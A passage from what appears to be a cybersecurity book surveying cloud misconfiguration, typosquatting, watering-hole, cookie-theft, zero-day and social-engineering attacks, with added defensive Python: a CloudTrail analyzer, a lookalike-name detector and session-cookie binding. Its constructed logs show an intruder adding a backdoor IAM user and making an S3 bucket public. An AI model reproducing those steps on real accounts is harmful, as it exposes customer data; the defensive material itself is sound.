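     "eventName": "CreateUser", "userIdentity": {"arn": WEB},
     "requestParameters": {"userName": "svc-backup2"}},
    {"eventTime": "2023-03-01T02:17:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "PutBucketPolicy", "userIdentity": {"arn": WEB},
     "requestParameters": {"bucketName": "customer-exports", "bucketPolicy": {
         "Statement": [{"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
                        "Resource": "arn:aws:s3:::customer-exports/*"}]}}},
    {"eventTime": "2023-03-01T09:00:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "ListUsers", "userIdentity": {"arn": ADMIN},
     "requestParameters": None},
]

if __name__ == "__main__":
    for when, who, finding in analyze(SAMPLE_EVENTS):
        print(when, who.rsplit("/", 1)[-1], finding)
```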
Where the attack originates:
This can occur, for instance, when a developer uses an out-of-date instance of a cloud service or application. There may be known vulnerabilities in this that were fixed in a later release. However, since an outdated program is still active, attackers can leverage this as a point of access before branching out over the cloud infrastructure.
Noblox.js, a wrapper for the Roblox API, is a library that many players use to automate interactions with the well-known Roblox gaming platform. The software also seems to be drawing in a new kind of audience. In 2021, hackers used the noblox.js package to launch typosquatting attacks, uploading packages that looked suspiciously similar but were actually loaded with ransomware to a registry for open-source JavaScript libraries. From there, they spread the malicious files via a chat service. But since September 2021, gamer Josh Muir and a few others have been aggressively going after the attackers in an effort to stop the spread of ransomware via the noblox.js package and other code libraries, as well as to stop further attacks on the gaming community.
What you should know: Typosquatting is a type of phishing assault in which perpetrators use frequently misspelled domain names to their advantage. The guilty party frequently hopes that a business, brand, or individual will purchase the domain from them rather than really planning to launch an attack. However, in other instances, fraudsters fabricate rogue websites that bear striking resemblances to authentic trademarks.
How the attack is carried out: This is not a really clever attack. It may be as easy as a 14-year-old registering a domain name and then infecting it with malware. The malignant version of this attack typically entails a hacker tricking people into connecting with harmful infrastructure by using fictitious domains.
Human error occurs, even for users who are aware of these risks. Most adversaries are all too aware of this fact and will exploit it whenever they can. Examples of this include phishing with lookalike addresses, hosting malicious content on domains that closely resemble corporate servers, and embedding phony command-and-control domains in malware.
Source of the attack: The target is more significant than the attack’s origins. Usually, the target of this attack is inexperienced internet users who won’t realize that the URL of their preferred domain is misspelled by one or two letters. Furthermore, this attack can come from nearly anywhere due to its simplicity—it can be as simple as registering a domain name.
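Because the attack depends on names that differ by a letter or two, the defensive counterpart is to watch new domain registrations and package names for lookalikes of the brands and libraries you depend on. The following is an added example, not from the original text, combining confusable-character normalization, suffix swaps, embedded brand names and Damerau-Levenshtein distance; the watchlist and candidate names are constructed.

```python
# Characters that read like another letter in many fonts (illustrative, not complete).
# Mapping i to l is deliberate: capital I and lowercase l are often indistinguishable.
_CHAR_MAP = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t",
                           "|": "l", "i": "l"})
_DIGRAPHS = (("rn", "m"), ("vv", "w"), ("cl", "d"))


def normalize(name: str) -> str:
    """Collapse confusable characters so visually identical names compare equal."""
    s = name.lower().translate(_CHAR_MAP)
    for pair, single in _DIGRAPHS:
        s = s.replace(pair, single)
    return s


def split_label(name: str):
    """'paypal.com' -> ('paypal', 'com'); a bare package name -> (name, '')."""
    label, dot, suffix = name.rpartition(".")
    return (label, suffix) if dot else (name, "")


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute, or swap
    adjacent characters (the classic 'lodahs' for 'lodash' typo)."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[-1][-1]


def classify(candidate: str, watched: str, max_distance: int = 1):
    """Reason the candidate looks like the watched name, or None."""
    if candidate.lower() == watched.lower():
        return None                                   # the genuine name itself
    c, w = normalize(candidate), normalize(watched)
    if c == w:
        return "homoglyph: identical after confusable-character normalization"
    (cl, cs), (wl, ws) = split_label(c), split_label(w)
    if cl == wl and cs != ws:
        return f"suffix swap: .{ws} registered as .{cs}"
    if cs and ws and wl in cl:
        # Domain-only rule; package names like 'react-dom' legitimately embed others.
        return f"brand name embedded in label ({wl})"
    d = osa_distance(c, w)
    if d <= max_distance:
        return f"edit distance {d} from {watched}"
    return None


def scan(candidates, watchlist, max_distance: int = 1):
    """Map each suspicious candidate to (watched name, reason); first match wins."""
    hits = {}
    for cand in candidates:
        for watched in watchlist:
            reason = classify(cand, watched, max_distance)
            if reason:
                hits[cand] = (watched, reason)
                break
    return hits


# Constructed watchlist of brands/libraries and constructed newly seen names.
WATCHLIST = ["paypal.com", "noblox.js", "lodash", "react"]
CANDIDATES = ["paypa1.com", "paypal.net", "paypal-secure-login.com", "nobIox.js",
              "noblox-js", "lodahs", "react-dom", "github.com"]

if __name__ == "__main__":
    for cand, (watched, reason) in scan(CANDIDATES, WATCHLIST).items():
        print(f"{cand:26} ~ {watched:12} {reason}")
```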
A Florida water and wastewater treatment facility contractor unintentionally hosted malicious code on its website, which resulted in the alleged Oldsmar water plant hack in 2021 and what became a classic watering hole attack. The malicious code discovered on the contractor’s website also seemed to target other Florida water utilities, and, unsurprisingly, on the same day the hack occurred, a browser traced to the city of Oldsmar visited the website. This suggests that the cybercriminals behind the attack were targeting a specific audience. The website didn’t launch exploit code; instead, it injected a script that worked as a browser enumeration and fingerprinting tool to gather data from visitors. This data included the type of browser, operating system, time zone, and whether or not the user had a camera and microphone. The data was then sent to a remote database hosted on a Heroku app site, which also hosted the script.
What is essential to know:
Similar to a real watering hole, a watering hole attack occurs when a user visits a website that has malware on it, which then compromises their computer with the intention of infiltrating their network and stealing financial information or data. The particular method is basically a zero-day assault, with the intention of infecting the computer system and gaining access to a network in order to obtain confidential or financial data.
How the attack is carried out: The attackers first profile the victim to find out which websites they usually visit, and then they search for weaknesses.
The attacker compromises these websites by taking advantage of known vulnerabilities, then sits back and waits, knowing that the victim in question will eventually visit. Malware delivered by the compromised website then spreads through the victim’s network, giving the attackers access to the whole system and the ability to branch out to other systems.
Where the attack is coming from: Although the hackers behind it are global in scope, many of them are from countries like China, Russia, and Eastern Europe, where organized crime is rife. A nationwide watering hole attack in 2018 was traced to the Chinese threat group LuckyMouse (also known as Iron Tiger, “EmissaryPanda,” “APT 27,” and “Threat Group 3390”), which is well-known for using a variety of attacks, including watering hole assaults, to target the manufacturing, government, and energy sectors.
Authentication cookies are used by almost every website we use, including social media platforms, cloud services, financial apps, and streaming services. While cookies do a great deal to enhance our online experience, they also present a vulnerability that can be used maliciously. In late 2019, a loosely connected group of hackers became well-known for taking over various YouTube channels with cookie-stealing software. After that, they either sold the hijacked accounts to the highest bidder or used them to broadcast bitcoin scams.
What you should know is that any activity the original user is permitted to do can be carried out by an attacker who has successfully stolen a session cookie. Organizations face a risk when cookies are used to identify verified users in single sign-on systems. This could allow the attacker to access every web application the victim can use, including financial systems, customer information, and line-of-business systems that might contain sensitive intellectual property.
How the attack works: After a user accesses a service and verifies their identity, a cookie is left on the user’s computer for an extended period so that they do not have to log in repeatedly. Malicious actors can use malware to steal these web session cookies and then import the cookie into a browser under their control, which lets them use the website or application as the user for as long as the session cookie is active. Once an adversary has gained access in this way, they can read confidential data and emails and carry out any operation the victim’s account is authorized to perform.
Where the attack originates:
Malware that copies the victim’s cookies and transmits them straight to the attacker is frequently used to steal cookies. There are several methods discussed in this book that can lead to the malware getting into the victim’s computer, including phishing, macro viruses, cross-site scripting, and more. Many of the hackers involved in cookie stealing are part of bigger networks with headquarters in China and Russia. For instance, it was discovered that the perpetrators of the YouTube attack were a part of a hacking organization that communicated via a forum with a Russian-speaking membership.
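The session-cookie risk described above can be reduced on the server side even when the cookie itself has already been copied off the victim's machine. The following added example (not code from the original text or from any product it mentions) binds each session to the client context seen at login, enforces an absolute and an idle lifetime, and revokes the session when the same cookie is presented from a different client. The session lifetimes, the user agent strings, the IP addresses and the token are all constructed values for illustration.

```python
"""Session-cookie binding and stolen-cookie detection (added example).
All session data and request events below are constructed for illustration."""
from dataclasses import dataclass
import hashlib
import ipaddress

SESSION_TTL = 3600       # absolute lifetime in seconds (assumed policy)
IDLE_TIMEOUT = 900       # idle timeout in seconds (assumed policy)


@dataclass
class Session:
    user: str
    fingerprint: str      # hash of the client context seen at login
    created: float
    last_seen: float
    revoked: bool = False


def client_fingerprint(user_agent: str, ip: str) -> str:
    """Bind a session to stable client properties.  The IP is reduced to its
    /24 network so ordinary address churn does not break a legitimate session."""
    net = ipaddress.ip_network(f"{ip}/24", strict=False)
    return hashlib.sha256(f"{user_agent}|{net}".encode()).hexdigest()


def set_cookie_header(token: str) -> str:
    """Hardened cookie attributes.  HttpOnly blocks script access, Secure and
    SameSite limit transport and cross-site sending, Max-Age caps the lifetime.
    None of these stop malware that reads the browser's own cookie store, which
    is why the server-side checks in SessionStore are still needed."""
    return (f"session={token}; HttpOnly; Secure; SameSite=Strict; "
            f"Path=/; Max-Age={SESSION_TTL}")


class SessionStore:
    def __init__(self) -> None:
        self.sessions: dict[str, Session] = {}
        self.alerts: list[str] = []

    def login(self, token: str, user: str, user_agent: str, ip: str, now: float) -> None:
        self.sessions[token] = Session(user, client_fingerprint(user_agent, ip), now, now)

    def validate(self, token: str, user_agent: str, ip: str, now: float) -> str:
        """Return 'ok', or the reason the request must re-authenticate."""
        s = self.sessions.get(token)
        if s is None:
            return "unknown"
        if s.revoked:
            return "revoked"
        if now - s.created > SESSION_TTL:
            return "expired"
        if now - s.last_seen > IDLE_TIMEOUT:
            return "idle"
        if client_fingerprint(user_agent, ip) != s.fingerprint:
            # Same cookie, different client: treat it as a replayed/stolen token,
            # kill the session and record an alert for the SOC.
            s.revoked = True
            self.alerts.append(
                f"session for {s.user} presented from {ip} with a different "
                f"client context; revoked, user must re-authenticate")
            return "mismatch"
        s.last_seen = now
        return "ok"


def simulate() -> list[str]:
    """Constructed scenario: the victim logs in, an attacker replays the cookie
    from another machine, and the victim's next request is forced to re-login."""
    store = SessionStore()
    tok = "c0ffee-constructed-token"
    victim_ua = "Mozilla/5.0 (Windows NT 10.0) Firefox/118.0"
    store.login(tok, "alice", victim_ua, "203.0.113.10", now=0)
    return [
        store.validate(tok, victim_ua, "203.0.113.25", now=60),       # same /24: ok
        store.validate(tok, "curl/8.1.2", "198.51.100.7", now=120),    # replay: mismatch
        store.validate(tok, victim_ua, "203.0.113.10", now=180),      # victim: revoked
    ]


if __name__ == "__main__":
    for outcome in simulate():
        print(outcome)
```

The fingerprint deliberately uses the /24 network rather than the exact address so that a home user whose address changes within the same network is not logged out; a stricter deployment could bind to a TLS-level or device-level identifier instead. The important defensive property is that the victim's next legitimate request after the replay returns "revoked", which forces a fresh login and invalidates the copy the attacker holds.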
It should come as no surprise that the number of zero-day defects is rising. However, 2021 completely eclipsed the previous years, with malicious actors taking advantage of 58 new zero-day threats, as opposed to just 25 vulnerabilities in 2020 and 21 vulnerabilities in 2019. The stakes are undoubtedly rising as vital systems become increasingly interconnected. In recent years, hackers using zero-day exploits have compromised Microsoft servers and installed sophisticated spyware on cellphones in order to conduct espionage operations against human rights activists, journalists, and politicians.
What you should know: A zero-day vulnerability is fundamentally a weakness. The word “zero” refers to the window of time available to respond: these vulnerabilities are exploited on the same day they become known. It is a flaw in software or a computer network that hackers exploit soon after the affected product is made available for public use.
How the attack occurs: A zero-day attack takes place when such a vulnerability is exploited. Although the attack’s methodology will vary depending on the vulnerability, zero-day attacks follow a consistent pattern. The hacker (or a group of hackers working together) first looks for vulnerabilities in the code base. As soon as they discover one, they write code that takes advantage of it. They then use one or more of the techniques covered in this book to break into the system, insert their malicious code, and start the exploit.
Where the attack originates:
Because technology is so widely used, zero-day attacks have increased dramatically. Although these attacks appear to be conducted from any location, they are frequently launched by nation-states or from regions with substantial cyber-underground networks and infrastructure.
A social engineering attack cost CoinsPaid, a cryptocurrency payment system, $37 million in July 2022. The threat actors tricked an employee into installing malicious software on their work computer before making a fictitious job offer. The company stated, “Although you may think that such an attempt to install malicious software on the employee’s computer is obvious, the hackers had spent six months gathering as much information as they could about CoinsPaid, our team members, our organizational structure, and other details.”
What you should know: The term “social engineering” refers to a wide range of malicious operations that use psychological manipulation to deceive users into divulging sensitive information or committing security blunders. Social engineering is particularly dangerous because it depends on human error rather than on flaws in operating systems and software. Unlike malware-based intrusions, mistakes committed by authorized individuals are considerably less predictable, which makes them more difficult to detect and stop.
How the attack is carried out: Social engineering attacks can be carried out anywhere there is human interaction, and they can take many different shapes. Here are five typical ways that social engineering attacks occur online.
To obtain the background knowledge required to carry out the attack, such as potential points of entry and lax security standards, the perpetrator first investigates the intended victim.
After gaining the victim’s trust, the attacker then prompts further actions that violate security protocols, such as disclosing private information or granting access to vital resources.
Where the attack originates: Social engineering can originate from a variety of places and have a wide range of goals. It usually takes the shape of phishing emails.
Additional methods include tailgating or piggybacking, in which an attacker enters a restricted area of a business by following an authenticated employee through secure doors; pretexting, in which the attacker crafts a plausible pretext to steal crucial data; and baiting and quid pro quo, in which the attacker offers the victim something desirable in exchange for login credentials.